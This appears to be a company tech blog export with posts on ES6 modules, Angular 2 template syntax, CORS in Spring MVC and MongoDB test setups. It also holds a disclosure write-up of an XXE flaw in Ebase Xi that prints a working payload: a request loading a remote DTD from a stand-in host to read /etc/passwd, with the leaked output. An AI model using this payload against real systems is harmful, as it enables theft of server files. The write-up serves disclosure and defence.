<li>Cannot import specific functions, you must take everything.</li>
<br />
<li>Cannot load modules programmatically / lazily.</li>
</ul>
<br />
Luckily ES6 has added support for creating modules. Let's define an ES6 module:<br />
<pre><code class="javascript">// Filename: Frame.js
export function moveBy({x, y, width, height}, [dx, dy]) {
return {x: x + dx, y: y + dy, width, height};
}
export function origin(frame) {
return {x: frame.x, y: frame.y};
}
export function size(frame) {
return {width: frame.width, height: frame.height};
}
export function getCenter({x, y, width, height}) {
return {
x: x + width / 2,
y: y + height / 2
}
}
export function distance({x: x1, y: y1}, {x: x2, y: y2}) {
let xd = x2 - x1;
let yd = y2 - y1;
return Math.sqrt(xd * xd + yd * yd);
}
export const maarten = "Maarten";</code></pre>
<br />
We can then import the module above in a couple of ways:<br />
<pre><code class="javascript">// 1. Import everything from the module to the current namespace:
import * from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
size(f);
// 2. Import everything under a binding in the current namespace:
import * as Frame from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
Frame.size(f);
// 3. Import only specific functions from the module
import {size, moveBy} from "Frame";
let f = {x: 10, y: 10, width: 100, height: 100};
size(f);
moveBy(f, [10, 44]);
// 4. Import specific functions and rebind them under a different name
import {size as frameSize} from "Frame";
// Name clash!
function size()
{
return 9000;
}
let f = {x: 10, y: 10, width: 100, height: 100};
frameSize(f);</code></pre>
<br />
The examples above show how versatile the new import syntax is. It is easy to prevent name clashes because there are so many ways to rename imports.<br />
<h2>
Want to know more?</h2>
<br />
Here's a list of resources with even more examples. I recommend going through the first two:<br />
<br />
• <a href="https://github.com/lukehoban/es6features">https://github.com/lukehoban/es6features</a><br />
<br />
• <a href="https://github.com/google/traceur-compiler/wiki/languagefeatures">https://github.com/google/traceur-compiler/wiki/LanguageFeatures</a><br />
<br />
• <a href="http://davidwalsh.name/es6-generators">http://davidwalsh.name/es6-generators</a><br />
<br />
• <a href="http://www.2ality.com/2015/03/es6-generators.html">http://www.2ality.com/2015/03/es6-generators.html</a> (exhaustive look at generators)<br />
<br />
• <a href="http://jakearchibald.com/2014/es7-async-functions/">http://jakearchibald.com/2014/es7-async-functions/</a> (technically ES7 but it is to awesome to ignore)<br />
<br />
• <a href="http://www.2ality.com/2014/09/es6-modules-final.html">http://www.2ality.com/2014/09/es6-modules-final.html</a><br />
<h1>
ES6 and Angular 2.0</h1>
<br />
By now you have a pretty good idea of some of the features that ES6 adds to JavaScript. So what does it have to do with Angular 2.0?<br />
<br />
The first thing is that Angular 2.0 will use classes a lot more instead of functions. Everything from Directives and Services will be classes in 2.0.<br />
<br />
But the most important thing is that 2.0 uses ES6’s module system instead of having a custom module system that 1.x had. This greatly affects the way we write the JavaScript part of our Angular 2.0 code.<br />
<h2>
Sneak peak</h2>
<br />
Here is a small example on how you would use modules in Angular 2.0:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2 ';</code></pre>
<br />
<h2>
Angular 1.x's module system</h2>
<br />
So what was wrong with the 1.x module system? Lets look at an example:<br />
<pre><code class="javascript">angular.module('users')
.factory('userFactory', ['$http', function($http) {
// code for userFactory which uses $http
}]);</code></pre>
<br />
In the module definition above we see a factory called "userFactory" being assigned to the<br />
<br />
"users" module. The "userFactory" has a dependency on the $http module that Angular 1.x provides.<br />
<br />
The first downside to the Angular 1.x module system is that it is string based. This makes the module system brittle: one spelling mistake and the whole thing falls down like a house of cards.<br />
<br />
The second downside is that in order to survive minification (jsmin) you must declare all dependencies inside of an array as strings. This is why '$http' is declared inside the array as a string, and as $http, the variable, in the function. You can use ngAnnotate so you don’t have to write this code manually, but it is still a hassle.<br />
<br />
The third, and most important downside, is that Angular 1.x modules only work inside the Angular world. If you have found a great library that was written in pure JavaScript without Angular in mind, you must jump through hoops to get it working inside Angular. The same is also true in reverse, if you have a great Angular module and you want to use it outside of Angular, you are going to have to rewrite the code.<br />
<h1>
Conclusion</h1>
<br />
By embracing ES6 and its module system it will become much easier to use existing non Angular JavaScript code in an Angular project, and vice versa.<br />
<br />
This is not only true for Angular but also true for other frameworks as well such as Ember, React and Knockout. Sharing code between frameworks is going to be easier than never before. ES6 modules will act as a bridge between frameworks and the greater JavaScript world.<br />
<br />
I hope that the ES6 modules system will unite the JavaScript community.<br />
<br />
So in conclusion when you hear about the death of the Angular 1.x module system, thats a good thing. We are getting a great alternative in ES6 modules in return.<br />
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-3-types/">Next week we will look at Types</a>, and why the Angular team thought ES6 alone was not enough!Anonymousnoreply@blogger.com42tag:blogger.com,1999:blog-8962763253387334081.post-50800019375975061462015-07-09T15:29:00.000+02:002016-02-01T13:23:28.986+01:00The Road to Angular 2.0 part 1: Template Syntax<h3>
Intro</h3>
A couple of weeks ago I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0, in this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<h3>
The Road</h3>
When the first details about Angular 2.0 emerged, my initial response was: "Wait, what?!" So many things will change from version 1.x to 2.0, is it even Angular?<br />
<br />
So I started digging through design documents, meeting notes, blogposts, and watched ng-conf videos. I quickly discovered a theme: The web will fundamentally change and Angular must evolve with it.<br />
<br />
Web Components are coming, ES6 is around the corner, TypeScript was invented. This series of blog posts takes you through these new innovations and shows you how they have influenced Angular 2.0’s design.<br />
<br />
I like to visualise all of the changes from Angular 1.x to 2.0 as a road. On this road we will come past various places that represent changes to Angular 1.x. Throughout this series of blog posts we will visit each of these places, and dive into how and why they have influenced Angular 2.0’s design. Here is the Road to Angular 2.0:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular.png"><br />
<img alt="theroadtoangular" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular.png" /><br />
</a><br />
<br />
<a name='more'></a><h3>
Template Syntax</h3>
Angular 2.0 has a new template syntax, which is radically different from 1.x. These changes made to the template syntax caused a strong negative reaction amongst the Angular community. It seemed like the Angular teams changed the heart of Angular for no good reason.<br />
<br />
Now it seems we must learn Angular 2.0 all over again. But fear not, once you understand how the new template syntax works, and you know the reasoning behind it, it will make sense.<br />
<br />
<h3>
The new binding syntax</h3>
Let's look at the differences in the bindings syntax between the two versions of Angular:<br />
<br />
<strong>Angular 1.x</strong><br />
<pre><code class="html">
<span>Username: {{user.username}}</span>
<img ng-src="{{ user.imageUrl }}"/>
<button ng-click="upvote(user)">+1</button>
</code></pre>
<strong>Angular 2.0</strong><br />
<pre><code class="html">
<span>Username: {{user.username}}</span>
<img [src]="{{ user.imageUrl }}"/>
<button (click)="upvote(user)">+1</button>
</code></pre>
The example above shows a username an image and an up-vote button.<br />
<br />
The first thing to note is that the first line is exactly the same in 1.x and 2.0. String interpolation is here to stay, so at least that part is still familiar.<br />
<br />
The second line of code shows us the first difference in the new template syntax. Instead of using the ng-src directive in Angular 2.0 we see [src]. The brackets represent a binding to a property, this means that when the value changes in the “controller” the value is updated in the view as well.<br />
<br />
The third line shows the new event syntax, whereas we used the special ng-click directive in 1.x we simply surround the event by parenthesis in 2.0.<br />
<br />
<h3>
Why change the binding syntax?</h3>
The main reason the syntax changed is unification. Lets look at the following line of 1.x template code:<br />
<br />
<pre><code class="html"><img ng-src="{{ user.imageUrl }}"/></code></pre>
<br />
In this code we use ng-src to fetch a template. If you take a step back from Angular and look at the code as a novice, who doesn’t know Angular, you could ask: Why not simply write:<br />
<br />
<pre><code class="html"><img src="{{ user.imageUrl }}"/></code></pre>
The reason of course is that the browser will try to fetch: {{ user.imageUrl }} from the server. This is because the browser doesn’t understand Angular’s string interpolation syntax.<br />
<br />
So in Angular 1.x the team worked around this by introducing ng-src. The browser doesn’t recognize ng-src as the property that represents url to the image, so it leaves it alone. Angular can then, under the hood, write the actual "src" property once the binding can be resolved.<br />
<br />
In Angular 1.x ng-src is not the only directive that does this, in fact there are many more: ng-blur, ng-click, ng-hide, ng-show, ng-disabled, ng-selected. All of these directives were made so Angular doesn’t get in the browsers way and vice versa. So for each property the browser has, a corresponding Angular directive exists.<br />
<br />
Why is this so bad, let's say for example that tomorrow all browsers include the following way to include HD images:<br />
<br />
<pre><code class="html"><img src-hd="hd-car.png" src="car.png"/></code></pre>
<br />
What does Angular 1.x have to do to make that work? Write a specialized directive of course! In an ideal world Angular would work with new HTML properties out of the box, without having to change Angular’s code.<br />
<br />
In Angular 2.0 the core team decided to tackle this problem at the root. By making one unified syntax for all properties. That’s where the bracket and parenthesis come from. So looking at the following line of code again:<br />
<br />
<pre><code class="html"><img [src]="{{ user.imageUrl }}"/></code></pre>
<br />
I would like to read this as: Create a property called "src" with the value of the expression, and update it whenever the value changes. The part between the brackets: "src" is just the name of the property Angular 2.0 must render on the HTML element.<br />
<br />
So if "src-hd" was introduced tomorrow, I could write this in Angular 2.0:<br />
<br />
<pre><code class="html"><img [src-hd]="hd-car.png" [src]="car.png"/></code></pre>
<br />
The best part is that, unlike Angular 1.x, Angular 2.0 would not have to be updated itself. So Angular 2.0’s template syntax unifies all of the built in directives from Angular 1.x into one syntax.<br />
<br />
<h3>
Benefits of the new binding syntax</h3>
The first benefit as you have already read is that Angular 2.0’s template syntax is more future proof than Angular 1.x’s.<br />
<br />
The new syntax is also easier to learn for beginners. If you already know HTML and you work as a web designer and suddenly you are dropped in an Angular 2.0 project, you simply need to learn to write square brackets around HTML properties you already know. There is no more need to learn al of these specific cases such as ng-src. The new syntax is simply closer to HTML than before.<br />
<br />
Another benefit of the new syntax is that it is easier to reason about. What I mean by reasoning is that it is easier to understand a template just by reading it. For example what does "selected" do in this Angular 1.x directive?<br />
<br />
<pre><code class="html"><google-map selected="markers(marker)"></google-map></code></pre>
<br />
It could mean one of the following things:<br />
<ol>
<li>It selects a certain marker based on the outcome of function "markers".</li>
<li>It is an event that executes a callback to "markers” whenever a marker is selected.</li>
<li>The "selected" property is a two way binding that changes through the "markers” function.</li>
</ol>
In order to know which one of the above answers is correct you would have to read the definition of the google-map directive.<br />
<br />
If this was an Angular 2.0 template:<br />
<br />
<pre><code class="html"><google-map (selected)="markers(marker)"></google-map></code></pre>
<br />
Now it is immediately clear that "selected" is an event because of the parenthesis. You would not have to read all of the surrounding code to understand what something does.<br />
<br />
<h3>
Local Variables</h3>
Angular 2.0 templates brings us a new feature that was not previously seen in Angular 1.x. This feature is called local variables, it allows us to create variables that are only available in a specific template.<br />
<br />
The reason for wanting to create variables that are only visible in your template is so you can create multiple templates for the same "controller". Imagine if you had to make a page with a YouTube player component, that needs to work on mobile and desktop. You discover two great Web Components: one that works great on desktop and another that works great on mobile devices. So you create two templates: one for desktop and one for mobile. But now you might need two controllers, because you have two different youtube components, right? The answer is no, because Angular 2.0 allows you to create 'variables' directly in your template.<br />
<br />
The syntax for creating a local variable is simply a name and a hashtag.<br />
<br />
Lets look at an fictitious example of the mobile template:<br />
<br />
<pre><code class="html"><youtube-mobile #player></youtube-mobile>
<button (click)="player.startVideo('Maarten's Baptism')">Play</button></code></pre>
<br />
Now take a look the desktop's version of the template:<br />
<br />
<pre><code class="html"><youtube-embedded #player hd="yes"></youtube-embedded>
<button (click)="player.run('Maarten's Baptism')">Play</button></code></pre>
<br />
In both cases you can see we define a local variable called #player which we use to reference the 'player' HTML elements. In the play buttons we can then reference "player" in the (click) event to start a video. Note that the API to start a video is different between the desktop and mobile version. So even though the API is different we didn't have to touch the controller at all, thats the power of local variables!<br />
<br />
<h3>
Templates</h3>
Angular 2.0 also introduces a new concept called 'directive templates', a directive template manipulates HTML. Lets look at an example:<br />
<br />
<pre><code class="html"><ul>
<li *ng-for="#name of names">Username: {{name}}</li>
</ul></code></pre>
<br />
If you know Angular 1.x you will find *ng-for familiar, it does what ng-repeat used to do. *ng-for manipulates the HTML by repeating the HTML element for N times.<br />
<br />
Note that we create a local variable called #name that we reference inside of the <li> element. The #name variable is only available inside of the <li> element, because it is scoped to the template.<br />
<br />
Another example of a template is *ng-if:<br />
<br />
<pre><code class="html"><div *ng-if="todos.length === 0">You are done!</div></code></pre>
<br />
<br />
The reason this is called a 'template' is because behind the scene's Angular 2.0 will convert the code to a <template> tag. So the *ng-for example would expand to:<br />
<br />
<pre><code class="html"><template ng-for #name="$implicit" [ng-for-of]="name">
<li>{{name}}</li>
</template></code></pre>
<br />
A <template> element represents an inert piece of DOM that the browser will completely ignore. This gives frameworks such as Angular an easy way to define templates, without the browser trying to parse them and mess with them. The <template> element was basically created for use by JavaScript frameworks.<br />
<br />
The benefits of the new *template syntax is that your IDE and text-editor can analyse these final <template> forms of the directive. This means that they can autocomplete your code and provide your with better help. This will ultimately make us developers that use Angular 2.0 more productive.<br />
<br />
<h3>
Codifying the new syntax</h3>
We can codify the new syntax as follows:<br />
<br />
<strong>Property bindings []</strong><br />
Square brackets represent a property which has a binding to a value. This binding is always an expression. Angular evaluates it every time inside the run loop when it is dirty checking for changes. Whenever a change is detected the binding is updated.<br />
<br />
The expressions should be pure: each time they are evaluated with the same parameters they should return the same value. They should not cause side effects.<br />
<br />
<strong>Events ()</strong><br />
Parenthesis represent events. Events handlers are statements, which cause side effects. The events always originate from actions taken by the user, such as: hovering the mouse or typing on the keyboard.<br />
<br />
<strong>Variables #</strong><br />
Hashtags represent local variables. These are only available inside of the template where they are defined. They can be used so different templates for mobile and desktop can contain completely different pieces of code, but still keep the same controller.<br />
<br />
<strong>Templates *</strong><br />
An asterisk represents a template with your HTML that is expanded to a <template> element behind the scenes. They were created so IDE's and text editors can better autocomplete the code.<br />
<br />
<h3>
Conclusion</h3>
The new syntax makes it easier for newcomers to learn, because it more closely resembles HTML, and because you do not have to learn the built in templates. It also makes it easier to reason about templates so we can more easily discover what a template does.<br />
<a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt2-es6/">Next week we will take a look at ES6</a>, the new version of JavaScript, and how it affects Angular 2.0.Anonymousnoreply@blogger.com9Netherlands52.132633 5.291265999999950549.638041 0.12769199999995084 54.627224999999996 10.454839999999951tag:blogger.com,1999:blog-8962763253387334081.post-37709759372534199692015-04-13T17:42:00.000+02:002015-12-14T15:55:41.782+01:00CORS with Spring MVC<p><strong>In this blog post I will explain how to implement Cross-Origin Resource Sharing (CORS) on a Spring MVC backend.</strong></p>
<a name='more'></a>
<p>
CORS is a W3C spec that allows cross-domain communication from the browser. Whenever a request is made from http://www.domaina.com to http://www.domainb.com, or even from http://localhost:8000 to http://localhost:9000, you will need to implement CORS on your backend.
</p>
<p>
To allow CORS we need to add the following headers to all Spring MVC responses:<br />
</p>
<pre><code class="java">
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://localhost:9000
Access-Control-Allow-Methods: GET, OPTIONS, POST, PUT, DELETE
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Max-Age: 3600
</code></pre>
<p>The easiest way to do this is by creating an interceptor:</p>
<pre><code class="java">
public class CorsInterceptor extends HandlerInterceptorAdapter {
public static final String CREDENTIALS_NAME = "Access-Control-Allow-Credentials";
public static final String ORIGIN_NAME = "Access-Control-Allow-Origin";
public static final String METHODS_NAME = "Access-Control-Allow-Methods";
public static final String HEADERS_NAME = "Access-Control-Allow-Headers";
public static final String MAX_AGE_NAME = "Access-Control-Max-Age";
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
response.setHeader(CREDENTIALS_NAME, "true");
response.setHeader(ORIGIN_NAME, "http://localhost:9000");
response.setHeader(METHODS_NAME, "GET, OPTIONS, POST, PUT, DELETE");
response.setHeader(HEADERS_NAME, "Origin, X-Requested-With, Content-Type, Accept");
response.setHeader(MAX_AGE_NAME, "3600");
return true;
}
}
</code></pre>
<p>
Then we register this interceptor in our web configuration:<br />
</p>
<pre><code class="java">public class WebMvcConfig extends WebMvcConfigurerAdapter {
@Override
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(new CorsInterceptor());
}
...
}
</code></pre>
<p>Now all GET requests will be handled correctly.</p>
<h2>Modification requests</h2>
<p>Whenever we do a modification request (POST, PUT, DELETE), our browser will first send a 'preflight' OPTIONS request. This is an extra security check to see if you can modify data. Because Spring MVC ignores OPTIONS requests by default, we will not get a CORS compliant response. We can overwrite this configuration as follows:</p>
<p>When using a Java configuration, in the DispatcherServletInitializer:</p>
<pre><code class="jave">
@Override
protected void customizeRegistration(Dynamic registration) {
registration.setInitParameter("dispatchOptionsRequest", "true");
super.customizeRegistration(registration);
}
</code></pre>
<p>
Or in the web.xml:</p>
<pre><code class="xml">
<servlet>
<servlet-name>yourServlet</servlet-name>
<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
<init-param>
<param-name>dispatchOptionsRequest</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
</code></pre>
<p>Now we can write a simple handler for OPTIONS requests:</p>
<pre><code class="java">@Controller
public class OptionsController {
@RequestMapping(method = RequestMethod.OPTIONS)
public ResponseEntity handle() {
return new ResponseEntity(HttpStatus.NO_CONTENT);
}
}
</code></pre>
<p>This controller handles all OPTIONS requests, sending back a NO_CONTENT response with the desired CORS headers due to our interceptor. Now that OPTIONS respond correctly, the PUT, POST and DELETE will also work correctly.</p>
<p><b>Congratulations, you now have a CORS compliant Spring MVC backend :)</b></p>
<h2>Multiple origins</h2>
<p>
Sometimes you have a backend service that is used by multiple applications and thus serves multiple origins. With some minor code changes we can implement this feature:</p>
<pre><code class="java">
public class CorsInterceptor extends HandlerInterceptorAdapter {
private static final Logger LOGGER = LoggerFactory.getLogger(CorsInterceptor.class);
public static final String REQUEST_ORIGIN_NAME = "Origin";
public static final String CREDENTIALS_NAME = "Access-Control-Allow-Credentials";
public static final String ORIGIN_NAME = "Access-Control-Allow-Origin";
public static final String METHODS_NAME = "Access-Control-Allow-Methods";
public static final String HEADERS_NAME = "Access-Control-Allow-Headers";
public static final String MAX_AGE_NAME = "Access-Control-Max-Age";
private final List<String> origins;
public CorsInterceptor(String origins) {
this.origins = Arrays.asList(origins.trim().split("( )*,( )*"));
}
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
response.setHeader(CREDENTIALS_NAME, "true");
response.setHeader(METHODS_NAME, "GET, OPTIONS, POST, PUT, DELETE");
response.setHeader(HEADERS_NAME, "Origin, X-Requested-With, Content-Type, Accept");
response.setHeader(MAX_AGE_NAME, "3600");
String origin = request.getHeader(REQUEST_ORIGIN_NAME);
if (origins.contains(origin)) {
response.setHeader(ORIGIN_NAME, origin);
return true; // Proceed
} else {
LOGGER.warn("Attempted access from non-allowed origin: {}", origin);
// Include an origin to provide a clear browser error
response.setHeader(ORIGIN_NAME, origins.iterator().next());
return false; // No need to find handler
}
}
}
</code></pre>
<p>All we do now is checking if our request origin is in the list of allowed origins and echo it back into the response. Thus if somebody makes a request from 'domain-a.com' we return back that same 'domain-a.com' as allowed origin, while for 'domain-b.com' we return 'domain-b.com'.</p>
<p>Because the list of allowed origins is provided as string, we can simply define our origins in a properties file:</p>
<pre>cors.origins=http://www.domain-a.com,http://www.domain-b.com</pre>Anonymousnoreply@blogger.com6tag:blogger.com,1999:blog-8962763253387334081.post-82465535564542030322015-03-25T20:25:00.000+01:002015-12-29T14:30:26.454+01:00Ebase Xi - Unsafe by Default - XXE<b>In my <a href="http://blog.42.nl/2014/12/ebase-xi-queries-unsafe-by-default.html">previous</a> blog post I questioned the safety of the default configuration of <a href="http://www.ebasetech.com/">Ebase Xi</a>. I knew then that something was wrong as I had already found and reported two vulnerabilities to Ebase. But nothing happened.</b> On the 6th of march, much to my surprise, I got an <a class="no_mtli" href="http://www.ebaseftp.com/download/alerts/EbaseXi%20Vulnerability%20Alert.html">official Ebase security alert</a> informing me that 'All Ebase Servers are vulnerable to XXE attacks'. Which was one of the two issues I originally reported. Now that its public knowledge you can read this post for full details.<a name='more'></a><br/><br/>In its essence an XML eXternal Entity (XXE) vulnerability is caused by an unconfigured or incorrectly configured XML parser. <a href="https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing">Owasp</a> has a nice page on it. But let's start at the beginning.<br/><h1>What are XML eXternal Entities?</h1><br/>An <a href="http://www.w3.org/TR/REC-xml/#sec-entity-decl">XML Entity</a> is a name for a character or series of characters in an XML document. A common example is the HTML non breaking space entity <i>&nbsp;</i> which represents the Unicode character <i>0x00A0</i>. External entities have their contents stored in some external resource such as a file or webpage. You can declare your own entities in the header of the XML document as part of a DTD. When the XML is parsed the entities are replaced by the contents they represent. So if you would reference file:///etc/passwd as an entity on a Linux system the entity would be replaced by the contents of that file. How <i>interesting ;)</i><br/><br/>Unfortunately having the ability to manipulate the XML input file won't allow you to ex-filtrate any data (you can try a <a href="http://en.wikipedia.org/wiki/Billion_laughs">billion laughs attack</a> with it though). For that you will need some part of the request document rendered back into the response document.<br/><br/>The <a href="http://localhost:3030/ufs/UnattendedXMLClient">UnattendedXMLClient</a> servlet in Ebase Xi does this with the name of the form. A typical request looks like this:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormRequest><Form id="SOME_FORM_ID"></Form></UFSFormRequest></pre><br/>If the form does not exist in the Ebase system you'll get the following error message:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormResponse><br/><Form id="SOME_FORM_ID" status="System Error"><br/><Error>Form not found in the repository: SOME_FORM_ID</Error><br/></Form><br/></UFSFormResponse></pre><br/>The name of the form is repeated in the response (twice!). So if we could put an entity in the id attribute referencing /etc/passwd the form id would be replaced with the contents of that file and it will be rendered in the response document as the form won't exist. File ex-filtrated. There is one catch though. External entities are <a href="http://www.w3.org/TR/REC-xml/#entproc">not allowed</a> in attribute values. <i>Or are they?</i><br/><h1>How to put an external entity in an attribute.</h1><br/>In their 2013 talk '<a href="https://www.youtube.com/watch?v=eBm0YhBrT_c">XML Out-of-Band Data Retrieval</a>' Timur Yunusov and Alexey Osipov described an ingenious way of putting an external entity into an attribute by having an external entity define an internal entity containing the contents of the file.<br/><br/>In the following example you see a slightly modified version of the UFSFormRequest from before. I've added a DOCTYPE declaration that includes a remote entity from example.org. This requires that Ebase server has access to the internet, which is commonly the case. Immediately thereafter I use that entity, so any contents of evil.dtd are placed there.<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><!DOCTYPE UFSFormRequest [<br/><!ENTITY % remote SYSTEM "http://example.org/evil.dtd"><br/>%remote;<br/>%param1;<br/>]><br/><UFSFormRequest><Form id="&internal;"></Form></UFSFormRequest></pre><br/>The contents of the external DTD are:<br/><pre><!ENTITY % payload SYSTEM "file:///etc/passwd"><br/><!ENTITY % param1 "<!ENTITY internal '%payload;'>"></pre><br/>Two new entities are defined, first the payload, which will hold the contents of the file we're interested in. Second param1 which holds .. another entity declaration as a string! First that string gets processed and %payload; will be replaced with the contents of the file. When the %param1; entity is processed in the request document it will be replaced by a new internal entity declaration which holds the contents of the file. Finally, in the actual xml document &internal; will be replaced by the contents of the file. So now we have assembled the following request on the server:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><!DOCTYPE UFSFormRequest [<br/><!ENTITY % remote SYSTEM "http://example.org/evil.dtd"><br/><!ENTITY % payload SYSTEM "file:///etc/passwd"><br/><!ENTITY % param1 "<!ENTITY internal '%payload;'>"><br/><!ENTITY internal 'root:x:0:0:root:/root:/bin/bash'><br/>]><br/><UFSFormRequest><Form id="root:x:0:0:root:/root:/bin/bash"></Form></UFSFormRequest></pre><br/>Obviously the form does not exist, Ebase will send an error response quoting the form name and so we obtain the contents of the file:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormResponse><br/><Form id="root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin " status="System Error"><br/><Error>Form not found in the repository: ROOT:X:0:0:ROOT:/ROOT:/BIN/BASH BIN:X:1:1:BIN:/BIN:/SBIN/NOLOGIN </Error><br/></Form><br/></UFSFormResponse></pre><br/><h1>Root cause analysis</h1><br/>The classpath of the Ebase server reveals jdom-1.0.jar, which is an (old!) api-wrapper for xml parsing. It defaults to the XML parser provided by the Java Runtime Environment, which for <a href="http://docs.oracle.com/javase/6/docs/technotes/guides/xml/jaxp/JAXP-Compatibility_160.html">Java 6 and later is Xerces</a>. By default the Xerces parser resolves external entities.<br/><h1>Resolution</h1><br/>In their Security Alert Ebase recommends to remove the servlets you don't need from your web.xml and if you do need the servlet give it an obscure path. Removing components you don't need is a good practice. Obscuring names is less so but may work for a while. Also, if you have an web application firewall configure it to block outside access to those urls.<br/><br/>Ebase promised a fix in 4.5.4 which, finally, <a href="http://www.ebaseftp.com/download/ebase_45/service_packs/" target="_blank">has appeared</a>. If you have the source code, fixing the XML parser configuration is simple, you need to disable doctype declarations or if that is not possible, disable external entities (both the parameter and general forms). Read the <a href="https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing">Owasp</a> page for full details.<br/><h1>Conclusion</h1><br/>Xml eXternal Entity vulnerabilities are a common flaw in applications that process XML. It becomes a risk when XML can be received from unverified outside sources. The default configuration of Ebase Xi exposes 3 of those endpoints. You can check if you're vulnerable using the method outlined in this post. That really leaves only one question: what did Ebase do with the other security issue that I have reported? <i>Let's hope I can write about that soon!</i>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com0tag:blogger.com,1999:blog-8962763253387334081.post-75794144490104151522015-02-20T12:44:00.000+01:002016-01-20T09:29:54.396+01:00In-memory MongoDB for unit and integration testsA few weeks ago I found myself having to fix a bug in a production system which uses MongoDB as its primary means of storage. As I was unfamiliar with the codebase, we had just taken over the project, the first thing you do is trying to find the test covering this functionality.<br />
<br />
Jaw drop; no test in sight. What was the case, none of the interactions with the backing storage was under any form of testing. So it could happen that a simple aggregation query wasn't returning the expected results<br />
<br />
This was my first project in which I used MongoDB, coming from projects using HSQLDB to test the validity and outcome of queries, the first thing that flashed through my mind was in-memory MongoDB. The first hit on Google wasn't promising <a href="http://stackoverflow.com/questions/10005697/does-mongo-db-have-an-in-memory-mode">http://stackoverflow.com/questions/10005697/does-mongo-db-have-an-in-memory-mode</a>, but luckily some following results hit the jackpot.<br />
<a name='more'></a><br />
<h2>
Embedded MongoDB</h2>
<br />
First I started out with: <a href="http://flapdoodle-oss.github.io/de.flapdoodle.embed.mongo/">Embedded MongoDB</a>. This is actually quite neat, it acts as a bridge between java and mongo, it downloads and fires-up a real mongo instance. This has the benefit that you are talking to an instance with the same capabilities as your production environment.<br />
<h3>
Setup</h3>
<br />
At 42 we do a lot with Spring and what is easier than bootstrapping your JUnit tests using a Spring applicationcontext. To help setup Embedded MongoDB I also used <a href="https://github.com/jirutka/embedmongo-spring">https://github.com/jirutka/embedmongo-spring</a> which is a nice builder to initialise Embedded MongoDB.<br />
<pre><dependency>
<groupId>cz.jirutka.spring</groupId>
<artifactId>embedmongo-spring</artifactId>
<version>1.3.0</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>de.flapdoodle.embed</groupId>
<artifactId>de.flapdoodle.embed.mongo</artifactId>
<version>1.46.1</version>
<scope>test</scope>
</dependency></pre>
<br />
A Spring java configuration file could look something like:<br />
<pre>@Configuration
public class IntegrationTestApplicationConfig extends AbstractMongoConfiguration {
@Autowired
private Environment env;
@Override
protected String getDatabaseName() {
return env.getRequiredProperty("mongo.db.name");
}
@Override
public Mongo mongo() throws Exception {
return new EmbeddedMongoBuilder()
.version("2.6.1")
.bindIp("127.0.0.1")
.port(12345)
.build();
}
}</pre>
<br />
But for running unit tests, as they claim, I find it a bit heavy weight. It requires a connection to the outside world to download a version of MongoDB. (Though it's also possible to set it up with a location where it can find the MongoDB packages locally). But spinning up a MongoDB seems a bit overkill. If you're running separated spring configurations for different unit tests you could even end up doing this multiple times<br />
<h2>
Fake Mongo (Fongo)</h2>
<br />
So I ended up using <a href="https://github.com/fakemongo/fongo" title="Fongo">Fongo</a> as it covered the basic needs of the project I was working on. It doesn't support al the functions that MongoDB offers but the basic CRUD and aggregations are supported.<br />
<h3>
Setup</h3>
<br />
Again the maven and Spring application configuration basics<br />
<pre><dependency>
<groupId>com.github.fakemongo</groupId>
<artifactId>fongo</artifactId>
<version>1.5.8</version>
<scope>test</scope>
</dependency></pre>
<br />
With a Spring java configuration file looking like:<br />
<pre>@Configuration
public class UnitTestApplicationConfig extends AbstractMongoConfiguration {
@Autowired
private Environment env;
@Override
protected String getDatabaseName() {
return env.getRequiredProperty("mongo.db.name");
}
@Override
public Mongo mongo() throws Exception {
return new Fongo(getDatabaseName()).getMongo();
}
}</pre>
<br />
<h2>
Running the tests</h2>
<br />
I created a base class to help me run the unit tests. This class helps me import collections into the in-memory mongo instance.<br />
<pre>@ActiveProfiles({ "test", "unit" })
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration(classes = { ApplicationConfig.class })
public abstract class SpringUnitTest {
@Autowired
private MongoTemplate mongoTemplate;
protected void importJSON(String collection, String file) {
try {
for (Object line : FileUtils.readLines(new File(file), "utf8")) {
mongoTemplate.save(line, collection);
}
} catch (IOException e) {
throw new RuntimeException("Could not import file: " + file, e);
}
}
}</pre>
<br />
And finally the actual test class<br />
<pre>public class StudentRepositoryTest extends SpringUnitTest {
@Autowired
private StudentRepository studentRepository;
@Before
public void setup() {
importJSON("student", "src/test/resources/student.json");
}
@Test
public void findStudentByName_should_return_student() {
assertEquals("Thijs", studentRepository.findByName("Thijs").getName());
}
}</pre>
<br />
Or you could do an Integration Test with Embedded MongoDB<br />
<pre>public class StudentServiceIT extends SpringIntegrationTest {
@Autowired
private StudentService studentService;
@Autowired
private StudentRepository studentRepository;
@Test
public void create_should_create_new_student() {
